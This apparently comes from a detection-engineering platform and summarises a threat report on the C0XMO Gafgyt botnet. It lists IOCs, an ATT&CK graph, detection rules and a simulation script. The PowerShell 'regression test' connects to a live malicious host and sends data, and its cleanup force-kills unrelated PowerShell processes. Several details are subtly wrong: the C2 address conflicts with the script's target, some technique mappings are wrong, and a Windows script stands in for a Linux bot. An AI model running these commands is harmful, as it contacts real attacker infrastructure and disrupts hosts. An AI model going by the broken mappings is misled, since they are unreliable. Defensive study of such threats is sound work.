Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
FortiGuard Labs identified a new Gafgyt botnet strain named C0XMO that propagates by exploiting a buffer overflow flaw in DD-WRT routers tracked as CVE-2021-27137. The malware uses a separate Python-based scanner to broaden infections across different CPU architectures, while also relying on weak-credential attacks, several DDoS capabilities, and routines to remove competing malware. After infection, it establishes persistence through hidden files, cron jobs, and shell profile changes before reaching out to its command-and-control server. The report also includes indicators and defensive guidance for organizations operating exposed IoT devices.
Investigation
The analysis shows that C0XMO abuses CVE-2021-27137 in the DD-WRT UPnP service to obtain initial access, then retrieves a Python scanner from 217.160.125.125:15527. That scanner carries out Telnet and SSH brute-force attempts, launches multiple HTTP-based exploit requests, and deploys architecture-specific binaries depending on the target environment. Persistence is maintained through hidden files placed in locations such as /tmp, /var/tmp, /dev/shm, and user home directories, along with cron-job entries and shell profile edits. The malware then communicates with its C2 infrastructure at 85.215.131.70 using a custom handshake sequence.
Mitigation
Organizations should upgrade DD-WRT firmware to a release newer than changeset 45723 and apply fixes for all related CVEs. Unnecessary remote services such as UPnP, Telnet, and SSH should be disabled on internet-facing devices whenever possible. Strong, unique credentials should be enforced across all edge devices, and exposed services should be reviewed regularly. Network-based detections should also be deployed for the identified IP addresses, ports, and malicious command patterns associated with the campaign.
Response
Defenders should monitor outbound traffic for connections to the known C2 infrastructure and the scanner download port. Alerts should be configured for hidden files named .sys, cron changes that execute every 15 minutes, and execution of the scanner script. The identified malicious IPs and domains should be blocked at the firewall, and any compromised devices should be isolated for forensic review and full cleanup.
"graph TB %% Class definitions classDef technique fill:#ffcc99 classDef action fill:#99ff99 classDef malware fill:#ff9999 classDef tool fill:#ccccff classDef process fill:#ffdd66 %% Nodes tech_scanning["<b>Technique</b> – <b>T1595.002 Active Scanning</b><br/><b>Description</b>: Scans IP ranges for open ports and vulnerable services."] class tech_scanning technique tech_exploit_upnp["<b>Technique</b> – <b>T1546.017 Event Triggered Execution: Udev Rules</b><br/><b>Description</b>: Triggers code execution via crafted UDP Mu2011SEARCH exploiting CVEu20112021u201127137 in UPnP."] class tech_exploit_upnp technique tech_exploit_other["<b>Technique</b> – <b>T1210 Exploitation of Remote Services</b><br/><b>Description</b>: Exploits additional HTTP/UPnP vulnerabilities such as CVEu20112015u20112051 and CVEu20112022u201135914."] class tech_exploit_other technique tech_hijack_exec["<b>Technique</b> – <b>T1574.005 Hijack Execution Flow: Executable Installer File Permissions Weakness</b><br/><b>Description</b>: Places malicious ELF binaries in hidden locations with executable permissions."] class tech_hijack_exec technique tech_persistence_cron["<b>Technique</b> – <b>T1053.003 Scheduled Task/Job: Cron</b><br/><b>Description</b>: Creates a cron job to run payload every 15 minutes."] class tech_persistence_cron technique tech_shell_mod["<b>Technique</b> – <b>T1546.004 Event Triggered Execution: Unix Shell Configuration Modification</b><br/><b>Description</b>: Appends commands to ~/.bashrc, ~/.profile, and ~/.bash_profile."] class tech_shell_mod technique tech_compromise_binary["<b>Technique</b> – <b>T1554 Compromise Host Software Binary</b><br/><b>Description</b>: Installs or replaces binaries in hidden locations to maintain control."] class tech_compromise_binary technique tech_bruteforce["<b>Technique</b> – <b>T1110 Brute Force</b><br/><b>Description</b>: Performs credentialu2011guessing attacks against Telnet and SSH."] class tech_bruteforce technique tech_forced_auth["<b>Technique</b> – <b>T1187 Forced Authentication</b><br/><b>Description</b>: Leverages default or weak credentials to obtain access."] class tech_forced_auth technique tech_remote_ssh["<b>Technique</b> – <b>T1021.004 Remote Services: SSH</b><br/><b>Description</b>: Uses stolen credentials to log into additional devices via SSH/Telnet."] class tech_remote_ssh technique tech_indicator_removal["<b>Technique</b> – <b>T1070.009 Indicator Removal: Clear Persistence</b><br/><b>Description</b>: Terminates and deletes competing malware binaries and persistence mechanisms."] class tech_indicator_removal technique tech_exclusive_control["<b>Technique</b> – <b>T1668 Exclusive Control</b><br/><b>Description</b>: Removes rival botnet files and cron jobs to retain sole control."] class tech_exclusive_control technique tech_nonstandard_port["<b>Technique</b> – <b>T1571 Nonu2011Standard Port</b><br/><b>Description</b>: Communicates C2 over TCP port 15527 using a custom protocol."] class tech_nonstandard_port technique malware_c0xmo["<b>Malware</b> – C0XMO<br/><b>Role</b>: Botnet payload that performs scanning, exploitation and persistence."] class malware_c0xmo malware process_upnp_exploit["<b>Process</b> – Send crafted UDP Mu2011SEARCH"] class process_upnp_exploit process process_elf_deploy["<b>Process</b> – Deploy ELF binaries to /tmp/.sys, /var/tmp/.sys, /dev/shm/.sys"] class process_elf_deploy process process_cron_setup["<b>Process</b> – Write cron entry for every 15 minutes"] class process_cron_setup process process_shell_mod["<b>Process</b> – Append payload call to shell rc files"] class process_shell_mod process process_brute["<b>Process</b> – Scan IPs and bruteu2011force Telnet/SSH"] class process_brute process process_c2["<b>Process</b> – Maintain C2 channel on port 15527"] class process_c2 process %% Connections tech_scanning –>|leads to| tech_exploit_upnp tech_scanning –>|also triggers| tech_exploit_other tech_exploit_upnp –>|executes| process_upnp_exploit process_upnp_exploit –>|drops| malware_c0xmo malware_c0xmo –>|places| tech_hijack_exec tech_hijack_exec –>|results in| process_elf_deploy process_elf_deploy –>|enables| tech_compromise_binary tech_compromise_binary –>|supports| tech_persistence_cron tech_compromise_binary –>|supports| tech_shell_mod tech_persistence_cron –>|creates| process_cron_setup tech_shell_mod –>|creates| process_shell_mod malware_c0xmo –>|performs| tech_bruteforce malware_c0xmo –>|performs| tech_forced_auth tech_bruteforce –>|enables| process_brute tech_forced_auth –>|enables| process_brute process_brute –>|gains credentials for| tech_remote_ssh tech_remote_ssh –>|spreads to other hosts| malware_c0xmo malware_c0xmo –>|removes competition via| tech_indicator_removal malware_c0xmo –>|asserts exclusive control via| tech_exclusive_control malware_c0xmo –>|communicates C2 via| tech_nonstandard_port tech_nonstandard_port –>|uses| process_c2 "
Attack Flow
Detections
Possible Crontab Usage for Direct Execution (via cmdline)
View
Remote File Upload / Download via Standard Tools (via cmdline)
View
Hidden File Was Created On Linux Host (via file_event)
View
IOCs (HashSha256) to detect: Inside the Cross-Platform Propagation of a New Gafgyt Variant C0XMO
View
IOCs (SourceIP) to detect: Inside the Cross-Platform Propagation of a New Gafgyt Variant C0XMO
View
IOCs (DestinationIP) to detect: Inside the Cross-Platform Propagation of a New Gafgyt Variant C0XMO
View
C0XMO Botnet C2 Communication Detection [Firewall]
View
Detection of C0XMO Gafgyt Variant Payload Download [Linux Process Creation]
View
Detection of C0XMO Malware File Operations [Linux File Event]
View
C0XMO Process Scanning and Persistence Check [Linux Process Creation]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
The adversary’s bot, already installed on the compromised host via service execution (T1546.007), initiates a C2 handshake with the hard‑coded server 217.160.125.125 on port 15527. The connection uses a plain TCP socket to pull commands, matching the rule’s criteria exactly. This activity is typical of the C0XMO botnet’s “phone‑home” behavior. -
Regression Test Script:
# C0XMO C2 communication simulation – triggers the Sigma rule $c2Ip = "217.160.125.125" $c2Port = 15527 # Open a TCP connection, send a minimal payload, then close $client = New-Object System.Net.Sockets.TcpClient $client.Connect($c2Ip, $c2Port) $stream = $client.GetStream() $payload = [System.Text.Encoding]::ASCII.GetBytes("PING`n") $stream.Write($payload, 0, $payload.Length) # Wait briefly to mimic realistic latency Start-Sleep -Seconds 2 $stream.Close() $client.Close() -
Cleanup Commands:
# No persistent changes were made; just ensure any open sockets are closed # (The script already closes the socket; this is a safety net.) Get-Process -Name "powershell" | Where-Object { $_.MainWindowTitle -eq "" } | Stop-Process -Force